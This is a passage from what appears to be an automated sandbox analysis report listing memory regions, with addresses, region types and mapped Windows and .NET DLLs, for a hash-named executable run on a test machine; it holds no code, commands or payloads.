name = "private_0x0000000000830000"
filename = ""
Region:
id = 1487
start_va = 0x6c4f0000
end_va = 0x6c568fff
monitored = 1
entry_point = 0x6c4ff82a
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 1488
start_va = 0x76f60000
end_va = 0x76fa4fff
monitored = 0
entry_point = 0x76f7de90
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1489
start_va = 0x76da0000
end_va = 0x76f5cfff
monitored = 0
entry_point = 0x76e82a10
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")
Region:
id = 1490
start_va = 0x76010000
end_va = 0x7615efff
monitored = 0
entry_point = 0x760c6820
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1491
start_va = 0x76300000
end_va = 0x76446fff
monitored = 0
entry_point = 0x76311cf0
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1492
start_va = 0x1d0000
end_va = 0x1f9fff
monitored = 0
entry_point = 0x1d5680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1493
start_va = 0x830000
end_va = 0x9b7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000830000"
filename = ""
Region:
id = 1494
start_va = 0x9c0000
end_va = 0x9cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009c0000"
filename = ""
Region:
id = 1495
start_va = 0x77150000
end_va = 0x7717afff
monitored = 0
entry_point = 0x77155680
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1498
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1499
start_va = 0x1d0000
end_va = 0x1d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 1500
start_va = 0x9d0000
end_va = 0xb50fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000009d0000"
filename = ""
Region:
id = 1501
start_va = 0xb60000
end_va = 0x1f5ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000b60000"
filename = ""
Region:
id = 1502
start_va = 0x1f60000
end_va = 0x20e2fff
monitored = 1
entry_point = 0x20e3f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 1503
start_va = 0x74350000
end_va = 0x7435bfff
monitored = 0
entry_point = 0x74353930
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")
Region:
id = 1508
start_va = 0x6cd20000
end_va = 0x6cd27fff
monitored = 0
entry_point = 0x6cd217b0
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1509
start_va = 0x1f60000
end_va = 0x202ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 1510
start_va = 0x6bf40000
end_va = 0x6c4effff
monitored = 1
entry_point = 0x6bf8a848
region_type = mapped_file
name = "mscorwks.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll")
Region:
id = 1511
start_va = 0x1e0000
end_va = 0x1e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 1512
start_va = 0x6bea0000
end_va = 0x6bf3afff
monitored = 0
entry_point = 0x6bea232b
region_type = mapped_file
name = "msvcr80.dll"
filename = "\\Windows\\WinSxS\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_d09188224426efcd\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9193_none_d09188224426efcd\\msvcr80.dll")
Region:
id = 1513
start_va = 0x550000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000550000"
filename = ""
Region:
id = 1517
start_va = 0x1f0000
end_va = 0x1f0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001f0000"
filename = ""
Region:
id = 1518
start_va = 0x550000
end_va = 0x550fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1519
start_va = 0x5c0000
end_va = 0x5cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 1520
start_va = 0x560000
end_va = 0x56ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000560000"
filename = ""
Region:
id = 1521
start_va = 0x570000
end_va = 0x57ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 1522
start_va = 0x580000
end_va = 0x58ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 1523
start_va = 0x590000
end_va = 0x59ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 1524
start_va = 0x5a0000
end_va = 0x5affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 1525
start_va = 0x5b0000
end_va = 0x5bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 1526
start_va = 0x7d0000
end_va = 0x80ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000007d0000"
filename = ""
Region:
id = 1527
start_va = 0x2030000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002030000"
filename = ""
Region:
id = 1528
start_va = 0x74a90000
end_va = 0x75e8efff
monitored = 0
entry_point = 0x74c4b990
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 1529
start_va = 0x76fb0000
end_va = 0x76fe6fff
monitored = 0
entry_point = 0x76fb3b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 1530
start_va = 0x764b0000
end_va = 0x769a8fff
monitored = 0
entry_point = 0x766b7610
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 1531
start_va = 0x77180000
end_va = 0x7720cfff
monitored = 0
entry_point = 0x771c9b90
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 1532
start_va = 0x77210000
end_va = 0x77253fff
monitored = 0
entry_point = 0x77217410
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 1533
start_va = 0x75f50000
end_va = 0x75f5efff
monitored = 0
entry_point = 0x75f52e40
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 1534
start_va = 0x810000
end_va = 0x810fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000810000"
filename = ""
Region:
id = 1535
start_va = 0x2130000
end_va = 0x2466fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1536
start_va = 0x1f60000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 1537
start_va = 0x2020000
end_va = 0x202ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 1538
start_va = 0x2470000
end_va = 0x446ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002470000"
filename = ""
Region:
id = 1539
start_va = 0x1f60000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 1540
start_va = 0x4470000
end_va = 0x44affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004470000"
filename = ""
Region:
id = 1541
start_va = 0x44b0000
end_va = 0x45affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000044b0000"
filename = ""
Region:
id = 1542
start_va = 0x6b3a0000
end_va = 0x6be99fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorlib.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\c4a3e0e914e73a68c0072e3064b48767\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\c4a3e0e914e73a68c0072e3064b48767\\mscorlib.ni.dll")
Region:
id = 1543
start_va = 0x76b10000
end_va = 0x76bfafff
monitored = 0
entry_point = 0x76b4d650
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1544
start_va = 0x45b0000
end_va = 0x4640fff
monitored = 0
entry_point = 0x45e8cf0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1545
start_va = 0x70040000
end_va = 0x700b4fff
monitored = 0
entry_point = 0x70079a60
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 1546
start_va = 0x45b0000
end_va = 0x47affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000045b0000"
filename = ""
Region:
id = 1548
start_va = 0x2000000
end_va = 0x200ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1549
start_va = 0x2010000
end_va = 0x2012fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "l_intl.nls"
filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls")
Region:
id = 1550
start_va = 0x45b0000
end_va = 0x4732fff
monitored = 1
entry_point = 0x4733f8e
region_type = mapped_file
name = "8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe"
filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8222127c77b4f83832246e9ce96da7741f1352da9d3548ad8b959b2e00b54c0d.exe")
Region:
id = 1551
start_va = 0x47a0000
end_va = 0x47affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047a0000"
filename = ""
Region:
id = 1552
start_va = 0x7afd0000
end_va = 0x7b49dfff
monitored = 0
entry_point = 0x7b44c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 1553
start_va = 0x45b0000
end_va = 0x45effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000045b0000"
filename = ""
Region:
id = 1554
start_va = 0x47b0000
end_va = 0x4c7dfff
monitored = 0
entry_point = 0x4c2c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 1555
start_va = 0x7afd0000
end_va = 0x7b49dfff
monitored = 0
entry_point = 0x7b44c76e
region_type = mapped_file
name = "system.windows.forms.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Windows.Forms\\2.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.windows.forms\\2.0.0.0__b77a5c561934e089\\system.windows.forms.dll")
Region:
id = 1556
start_va = 0x6abf0000
end_va = 0x6b392fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\2dcc35955cda7c1279cec70d8a3ac1c1\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\2dcc35955cda7c1279cec70d8a3ac1c1\\system.ni.dll")
Region:
id = 1557
start_va = 0x45f0000
end_va = 0x45fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000045f0000"
filename = ""
Region:
id = 1558
start_va = 0x4600000
end_va = 0x460ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004600000"
filename = ""
Region:
id = 1559
start_va = 0x7ade0000
end_va = 0x7ae7bfff
monitored = 0
entry_point = 0x7ae6921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 1560
start_va = 0x4610000
end_va = 0x46abfff
monitored = 0
entry_point = 0x469921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 1561
start_va = 0x7ade0000
end_va = 0x7ae7bfff
monitored = 0
entry_point = 0x7ae6921e
region_type = mapped_file
name = "system.drawing.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\System.Drawing\\2.0.0.0__b03f5f7f11d50a3a\\System.Drawing.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.drawing\\2.0.0.0__b03f5f7f11d50a3a\\system.drawing.dll")
Region:
id = 1562
start_va = 0x6ab90000
end_va = 0x6abeafff
monitored = 1
entry_point = 0x6abd9010
region_type = mapped_file
name = "mscorjit.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll")
Region:
id = 1563
start_va = 0x46b0000
end_va = 0x46b0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000046b0000"
filename = ""
Region:
id = 1564
start_va = 0x46c0000
end_va = 0x46cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046c0000"
filename = ""
Region:
id = 1565
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1566
start_va = 0x5e430000
end_va = 0x5e4d5fff
monitored = 0
entry_point = 0x5e4be14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 1567
start_va = 0x46e0000
end_va = 0x4785fff
monitored = 0
entry_point = 0x476e14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 1568
start_va = 0x4790000
end_va = 0x479ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004790000"
filename = ""
Region:
id = 1569
start_va = 0x5e430000
end_va = 0x5e4d5fff
monitored = 0
entry_point = 0x5e4be14e
region_type = mapped_file
name = "microsoft.visualbasic.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.VisualBasic\\8.0.0.0__b03f5f7f11d50a3a\\Microsoft.VisualBasic.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.visualbasic\\8.0.0.0__b03f5f7f11d50a3a\\microsoft.visualbasic.dll")
Region:
id = 1570
start_va = 0x4c80000
end_va = 0x4c8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c80000"
filename = ""
Region:
id = 1571
start_va = 0x4c90000
end_va = 0x4c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c90000"
filename = ""
Region:
id = 1572
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1573
start_va = 0x4ca0000
end_va = 0x4caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 1574
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1575
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1576
start_va = 0x7fe60000
end_va = 0x7feaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe60000"
filename = ""
Region:
id = 1577
start_va = 0x7fe50000
end_va = 0x7fe5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fe50000"
filename = ""
Region:
id = 1578
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1579
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1580
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1581
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1582
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1583
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1584
start_va = 0x4ca0000
end_va = 0x4caffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004ca0000"
filename = ""
Region:
id = 1585
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1586
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1587
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1588
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1589
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1590
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1591
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1592
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1593
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1594
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1595
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1596
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1597
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1598
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1599
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1600
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1601
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1602
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1603
start_va = 0x46d0000
end_va = 0x46dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1604
start_va = 0x4cb0000
end_va = 0x4cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 1605
start_va = 0x4cc0000
end_va = 0x4ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cc0000"
filename = ""
Region:
id = 1606
start_va = 0x4cd0000
end_va = 0x4cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cd0000"
filename = ""
Region:
id = 1607
start_va = 0x6f880000
end_va = 0x6f89cfff
monitored = 0
entry_point = 0x6f883b10
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 1608
start_va = 0x60000000
end_va = 0x60007fff
monitored = 0
entry_point = 0x60003fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 1609
start_va = 0x46d0000
end_va = 0x46d7fff
monitored = 0
entry_point = 0x46d3fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 1610
start_va = 0x60000000
end_va = 0x60007fff
monitored = 0
entry_point = 0x60003fae
region_type = mapped_file
name = "accessibility.dll"
filename = "\\Windows\\assembly\\GAC_MSIL\\Accessibility\\2.0.0.0__b03f5f7f11d50a3a\\Accessibility.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\accessibility\\2.0.0.0__b03f5f7f11d50a3a\\accessibility.dll")
Region:
id = 1611
start_va = 0x4cb0000
end_va = 0x4cbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cb0000"
filename = ""
Region:
id = 1612
start_va = 0x4cb0000
end_va = 0x4cb0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004cb0000"
filename = ""
Region:
id = 1613
start_va = 0x4cb0000
end_va = 0x4cb1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004cb0000"
filename = ""
Region:
id = 1614
start_va = 0x74120000
end_va = 0x7423efff
monitored = 0
entry_point = 0x74165980
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1615
start_va = 0x4cc0000
end_va = 0x4cc0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004cc0000"
filename = ""
Region:
id = 1616
start_va = 0x4ce0000
end_va = 0x4d9bfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004ce0000"
filename = ""
Region:
id = 1617
start_va = 0x4cc0000
end_va = 0x4cc3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004cc0000"
filename = ""
Region:
id = 1618
start_va = 0x4da0000
end_va = 0x4daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004da0000"
filename = ""
Region:
id = 1619
start_va = 0x4da0000
end_va = 0x4daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004da0000"
filename = ""
Region:
id = 1620
start_va = 0x4db0000
end_va = 0x4db3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004db0000"
filename = ""
Region:
id = 1621
start_va = 0x4dc0000
end_va = 0x4dc0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004dc0000"
filename = ""
Region:
id = 1622
start_va = 0x4dd0000
end_va = 0x4ddffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004dd0000"
filename = ""
Region:
id = 1623
start_va = 0x4de0000
end_va = 0x4deffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004de0000"
filename = ""
Region:
id = 1624
start_va = 0x4dd0000
end_va = 0x4dd1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004dd0000"
filename = ""
Region:
id = 1625
start_va = 0x4de0000
end_va = 0x4de0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004de0000"
filename = ""
Region:
id = 1626
start_va = 0x4df0000
end_va = 0x4df4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui")
Region:
id = 1627
start_va = 0x4e00000
end_va = 0x4e04fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004e00000"
filename = ""
Region:
id = 1628
start_va = 0x4e10000
end_va = 0x4e1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e10000"
filename = ""
Region:
id = 1629
start_va = 0x4e20000
end_va = 0x4e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e20000"
filename = ""
Region:
id = 1630
start_va = 0x6fe40000
end_va = 0x6fe52fff
monitored = 0
entry_point = 0x6fe49950
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 1631
start_va = 0x6fe10000
end_va = 0x6fe3efff
monitored = 0
entry_point = 0x6fe295e0
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 1632
start_va = 0x73c30000
